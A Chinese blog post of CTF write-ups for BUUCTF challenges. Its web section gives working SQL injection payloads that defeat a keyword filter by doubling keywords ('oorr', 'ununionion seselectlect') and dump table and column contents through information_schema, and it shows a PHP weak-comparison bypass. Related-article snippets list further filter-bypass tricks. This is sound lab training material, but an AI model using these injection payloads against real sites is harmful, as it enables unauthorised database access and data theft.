BUUCTF-sql双写绕过

已于 2023-04-09 20:55:45 修改
阅读量621 收藏 1
点赞数
分类专栏: BUUctf 文章标签: java html 服务器
于 2023-04-06 18:56:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/129964576
版权

WEB

[极客大挑战 2019]BabySQL

打开环境 查看什么类型

输入

输入1'
username='1''&password='1''

字符型

我们开始尝试万能密码

1' or 1=1-- +

 

发现返回的东西和我们输入不一样  or没了

过滤了or

这个是关键 我们使用双写绕过

1' oorr 1=1-- +

 得到了账号密码

我们开始sql注入

1. 字段数

username=admin&password=''1' order by 4-- +''

 发现or 过滤了 我们看看

1' oorrder by 4-- +

还是报错 我们接着看看是不是过滤了 by 因为如果过滤了der 他会返回or

1' oorrder bbyy 4-- +

成功了 三个字段

我们开始爆破数据库

0' union select 1,2,database()-- +    报错'1,2,database()-- '

0' ununion select 1,2,database()-- +   报错'un 1,2,database()-- ''

0' ununionion seselectlect 1,2,database()-- +

得到数据库名 geek

开始爆表

0' ununionion seselectlect 1,2,group_concat(table_name)frfromom infoorrmation_schema.tables whwhereere table_schema='geek'-- +

经过尝试 union select  or from where 都过滤了

开始爆数据

0' ununionion seselectlect 1,2,group_concat(column_name)frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'-- +


0' ununionion seselectlect 1,2,group_concat(column_name)frfromom infoorrmation_schema.columns whwhereere table_name='geekuser'-- +

都是返回这些名

0' ununionion seselectlect 1,2,group_concat(id,username,passwoorrd)frfromom geek.b4bsql-- +

得到flag

[ACTF2020 新生赛]BackupFile

打开环境

让我们找源文件 

我们想到

index.php.bak

下载成功

我们得到备份文件

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

这里就得到绕过两个 一个是is_numeric() 另一个是==

!is_numeric():
如果为数字或者数字字符串 True
如果不是 返回 false
!0=1
所以我们需要这个是数字或者数字字符串


==
'123a'==123 True

这样就很简单了

key=123



123为数字 所以
!is_numeric() 绕过


因为==弱比较
所以

123=123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3 true

得到flag

Crypto

Alice与Bob

 http://www.jsons.cn/quality/

 合并

101999966233

CTF在线工具-哈希计算|MD5、SHA1、SHA256、SHA384、SHA512、RIPEMD、RIPEMD160

进行MD5计算

 大帝的密码武器

下载得到题目和密文 意思就是让我们解密题目 然后取得偏移量 然后在加密密文

str1 = 'FRPHEVGL'
str2 = str1.lower()
num = 1
for i in range(26):
    print("{:<2d}".format(num),end = ' ')
    for j in str2:
        if(ord(j)+num > ord('z')):
            print(chr(ord(j)+num-26),end='')
        else:
            print(chr(ord(j)+num),end='')
    num += 1
    print('')

使用代码取得26次的解密

偏移量为13 的时候得到单词 

我们把密文加密 偏移量为13

提交flag

Misc

ningen

改后缀 为zip

暴力破解

小明的保险箱

同理

爱因斯坦

下载文件 查看属性

 提到password 说明加密

我们改后缀

 没有提示 只有刚刚的那个not password 试一试

得到flag

双层小牛堡
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap 双写关键字绕过 tamper
shadowwolf’s blog
08-30 2542
双写绕过的存在一般都是在某一些简单的waf中,将关键字select等只使用replace()函数置换为空,这时候可以使用双写关键字绕过 但是鉴于手注有些小麻烦,所以还是上sqlmap sqlmap中无双写注入的脚本,所以我编了一个tamper,可以根据测出的被ban的关键词进行修改: #!/usr/bin/env python ''' sqlmap 双写绕过 by:shadowwolf ''' from lib.core.compat import xrange from lib.core.enums i
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sql注入 绕过
weixin_54472394的博客
06-05 113
2.单双引号 注释 过滤 3.双写绕过 4.关键字过滤 5.全部查出来 参数污染 一个成立即可 6.空格过滤 7.大小 二次注入
sql联合注入步骤例题LoveSQL 和 BabySQL双写绕过
qq_58970968的博客
04-04 1292
拿到题目有登录界面 1.想到万能密码: 1' or 1=1# 发现登录成功;但是拿到这个页面毫无卵用;浪费时间,由于是一道考sql注入的题,想到后台肯定有表字段这些,flag就藏在里面,爆出他们就行了; 2:查有多少字段: 1'order by 4# 这时报错,说明有三个字段, 3.有三个字段之后在看回显,也就是说看显示的是哪几个字段;: 1' union select 1,2,3# 回显了2和3;回显字段为第二个和第三个; 4.然后爆数据库名: 1' union select .
buu web:[极客大挑战 2019]BabySQLsql注入双写绕过
m0_55378150的博客
04-18 3037
打开靶场,熟悉的界面 依旧是先上万能密码 1' or 1=1# 1' or 1=1# 好家伙,直接就给你报错了,可以看到,or被它过滤掉了,所以我们尝试一下双写绕过 1' oorr 1=1# 1' oorr 1=1# 成功登录! 可以拿admin回去登录界面继续注入了,先爆字段 admin' oorrder by 2#(密码随便输) 提示在字段数附近有报错,猜测可能是by也被过滤了,依旧是双写绕过 admin' oorrder bbyy 2# 可以的,通过...
SQL注入漏洞(绕过篇)
errorr0
06-24 4735
SQL注入的绕过手法
第十三节 SQL注入绕过技术-01
09-15
本节课程将详细介绍 SQL 注入绕过技术的四种方法:大小绕过双写绕过、编码绕过和内联注释绕过。 大小绕过 大小绕过是最简单的 SQL 注入绕过方法之一。当程序中设置了过滤关键字时,如果过滤过程中没有对...
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
SQL注入绕过的技巧总结
09-09
本文主要探讨了三种SQL注入绕过技术:引号绕过、逗号绕过以及比较符(<, >)绕过,这些都是在SQL防注入措施下仍能实施攻击的有效手段。 首先,**引号绕过** 是针对那些过滤了单引号(')或双引号(")的系统。...
x-pack-sql-jdbc-6.5.4.jar
01-22
x-pack-sql-jdbc-6.5.4.jar
SQL注入实战:绕过操作
ting_liang的博客
01-27 2229
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小变形,Or,OR,oR,And,ANd,aND等-代码中大小不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
iwebsec靶场 SQL注入漏洞通关笔记9- 双写关键字绕过
mooyuan的博客
11-29 1400
打开靶场第09关,http://192.168.71.151/sqli/09.php?id=1如下所示​SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第9关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的第09关卡过滤了不区分大小select关键字。
Sql注入绕过
Matheus的博客
08-01 2111
SQL注入绕过双写绕过 1.过滤判断 xxx.com?id=1 访问?id=1and1=1 页面报错 1=1,发现and被过滤,这时候尝试使用双写的方式绕过,如aanndd 1=1,当and被过滤后,aanndd变成了and,所以这时传输数据库的语句是 and 1=1 ,如果当访问 order by 错误信息为”der by”这发现过滤了or,这双写or,后面注入和union注入的一致。 2.练习sqli-labs Less-25 Trick with OR & AND (过滤了or和and)
sql注入绕过方法
qq_53030229的博客
08-26 3215
一、大小绕过 有时候,在我们执行sql注入过程中,代码对有些关键词进行过滤和替换,这时候我们可以利用更换大小方式绕过sql语句可以识别大小。 执行下来效果还是一样的。 二、双写绕过 在我们进行注入时候,有时候会遇到把关键词进行直接替换为空或者删除的注入,这时候,相当于你的注入语句就直接失效了,这个时候我们就可以使用双写绕过。 三、编码绕过 使用URL编码对输入语句进行加密,然后服务器端会对其进行解密。 四、内联注释绕过 在mysql中,内联注释绕过的语句会被当做sql语句执行。 替换位置也
buuctf(babysql)(双写绕过)
qq_75005708的博客
04-10 211
这道题最明显的是双写绕过,然后我们需要去拼接双写语句达到绕过的目的,双写的方式也不一定是固定的,这道题在我们尝试的时候也会发现其实它也过滤好几个单词,有时候我们需要部分双写,也不需要整个单词双写,因为它不是整个单词都过滤。如果我们在尝试这条语句的时候,发现报错,可能是环境的问题,我们用括号把information到tables括起来就不用空格了,一般情况下是不会有问题。然后我们就发现登陆成功,应该是or被过滤了,我们要双写绕过它,我们接着查看它的列数。我们发现2和3在页面显示,接着查看它的数据库。
sql注入(三)绕过方法及防御手段
m0_63306943的博客
05-02 7783
1)如果 waf 过滤了逗号,并且只能盲注,在取子串的几个函数中,有一个替代逗号的方法就是使用 from for ,其中 pos 代表从 pos 个开始读取 len 长度的子串。rlike 模糊匹配,只要字段的值中存在要查找的 部分 就会被选择出来,用来取代 = 时,rlike 的用法和上面的 like 一样,没有通配符效果和 = 一样。因为这些sql命令的执行, 必须先的通过语法分析,生成执行计划,既然语法分析已经完成,已经预编译过了,那么后面输入的参数,是绝对不可能作为sql命令来执行的,
CTFHub】 文件上传 — 双写绕过
cx_sam的博客
08-06 2425
CTFHub WEB 文件上传
ctfhub-双写绕过
m0_62094846的博客
12-09 111
上传1.php,只返回1. ,php被过滤了 然后就可以蚁剑连接了
sql注入双写绕过的原理
03-01
SQL注入双写绕过是一种SQL注入攻击的技术手段,用于绕过一些简单的防御机制。其原理如下: 1. SQL注入简介:SQL注入是一种常见的安全漏洞,攻击者通过在用户输入的数据中插入恶意的SQL代码,从而执行非法的数据库操作。这些恶意代码可以修改、删除或者泄露数据库中的数据。 2. 双写绕过原理:在一些情况下,开发人员会对用户输入进行简单的过滤,例如替换特殊字符或者转义字符。然而,攻击者可以利用这种过滤机制中的漏洞,通过双写绕过绕过过滤。 - 双写:攻击者可以利用某些字符的特性,在输入中使用两个相同的字符来绕过过滤。例如,如果过滤机制将单引号(')替换为两个单引号(''),那么攻击者可以在输入中使用两个单引号来绕过过滤。 - 绕过:通过使用双写绕过过滤,攻击者可以成功地插入恶意的SQL代码,从而执行非法的数据库操作。 3. 示例:假设有一个登录页面,用户需要输入用户名和密码进行登录。开发人员对用户输入进行了简单的过滤,将单引号替换为两个单引号。攻击者可以利用双写绕过绕过这个过滤机制。 - 原始查询:SELECT * FROM users WHERE username = 'admin' AND password = 'password' - 过滤后的查询:SELECT * FROM users WHERE username = 'admin'' AND password = 'password' 攻击者可以在用户名输入框中输入 `' OR '1'='1`,这样在拼接SQL语句时,会变成: SELECT * FROM users WHERE username = '' OR '1'='1' AND password = 'password' 这样,攻击者成功绕过了过滤机制,并且可以登录到管理员账户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值